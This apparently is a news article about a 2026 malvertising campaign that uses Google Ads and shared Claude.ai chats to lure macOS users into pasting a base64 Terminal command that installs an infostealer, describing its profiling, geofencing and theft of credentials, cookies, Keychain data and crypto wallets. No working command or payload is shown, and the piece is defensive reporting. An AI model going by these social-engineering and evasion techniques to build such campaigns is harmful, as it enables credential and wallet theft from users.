Skip to main content
TechnologyMay 11, 2026· 4 min read

Did you search for 'Claude mac download'? You might have clicked on an ad that installs malware

A New Malvertising Campaign Targeting macOS

A new active malvertising campaign is exploiting Google Ads and the chat-sharing feature of Claude.ai to distribute malware on macOS. It was uncovered by Berk Albayrak, a security engineer at Trendyol Group, who published his findings on LinkedIn. The peculiarity of this campaign, compared to classic malvertising operations, lies in a detail that makes it particularly insidious: the sponsored ads point to the actual domain of Anthropic, claude.ai, rather than a clone site. The malicious payload is hosted directly on the legitimate platform.

The Attack Chain

Users searching for "Claude mac download" on Google may find a sponsored ad that correctly lists claude.ai as the destination. However, clicking it does not lead to the official Anthropic page; instead, it redirects to a public shared chat that poses as an official installation guide for "Claude Code on Mac," attributed to Apple Support. This is a significant technical distinction compared to similar campaigns that occurred earlier, in February-March 2026, which exploited Claude artifacts, standalone outputs generated by the platform. The chat guides the user to open the Terminal and paste a base64 command that secretly downloads and executes a malware loader.

While attempting to verify Albayrak's report, researchers from BleepingComputer stumbled upon a second malicious chat with a different domain and payload, but identical in structure and approach to social engineering. The payload identified by BleepingComputer is a shell script compressed with Gunzip that runs entirely in memory, leaving no obvious traces on disk.

Polymorphic Payload and Selective Targeting

The technical behavior of the loader identified by BleepingComputer reveals a non-trivial level of operational sophistication. The server uses so-called polymorphic delivery: each request receives a version of the payload with unique obfuscation, rendering hash or signature-based checks ineffective, which many security tools adopt as the first line of defense. Before proceeding to the next phase, the loader checks for configured keyboard input sources on the system. If it detects Russian layouts or those from CIS countries, the malware self-terminates, sending a silent ping to the attacker's server with the status cis_blocked. Only machines that pass this geographic filter receive the subsequent payload.

Victim profiling does not stop here. The script collects the external IP address, hostname, macOS version, and keyboard locale, sending everything to the server before proceeding. This selection phase suggests that the operators are seeking specific targets and are not interested in a blanket distribution of the malware. During the second phase, it is downloaded and executed via osascript, macOS's native scripting engine, allowing remote code execution without ever placing a traditional application or binary on disk.

Two Variants, Two Behaviors

The two intercepted variants are not identical in post-infection behavior. The variant discovered by Albayrak skips the profiling stage and goes directly for data exfiltration, which he identified as MacSync. The variant identified by BleepingComputer, on the other hand, performs full profiling before proceeding and has not been explicitly attributed to MacSync: technically related but with a partially different operational flow. What links them both is the exfiltration of credentials from the browser, session cookies, and content from the macOS Keychain, along with any crypto wallets present on the system. The data is packaged and sent to the C2 server via HTTP POST, masking the traffic with a legitimate macOS user-agent.

An Expanding Pattern

This is not the first time AI platforms have been weaponized with this technique. In December 2025, similar campaigns emerged exploiting shared chats from ChatGPT and Grok to distribute the info-stealer AMOS. The campaigns in February-March 2026, however, used Claude artifacts, recording over 15,600 views on a single malicious artifact before being removed. The current campaign represents a natural evolution: artifacts, which can be monitored more easily, have been abandoned in favor of shared chats that offer a richer and more compelling narrative context to apply social engineering techniques. According to an analysis by Pillar Security published in March 2026, at least 20 distinct malware campaigns targeting AI tools and vibe coding were documented between February 2025 and March 2026, with macOS being an disproportionately targeted compared to its market share.

The abuse mechanism exploits a structural characteristic of these platforms: user-generated and publicly accessible content is hosted on the same domain as the official application. Therefore, there is no fake domain to identify in the ad's URL, and Google’s anti-malvertising filters cannot distinguish a malicious chat from a legitimate one if the destination domain is the actual service's domain. The practical recommendation is to directly visit official sites when intending to download a native app and to avoid clicking on sponsored results for AI tools, treating with strong suspicion any instructions that ask to paste commands in the Terminal, regardless of the apparent source.

Counterfeit DDR5 RAM Memory Floods the PC Market: Now Even Plastic ChipsDiscounts on CMF by Nothing Products: Buds Pro 2 at €49.95 on Amazon and Great Prices for Buds 2 and Headphone Pro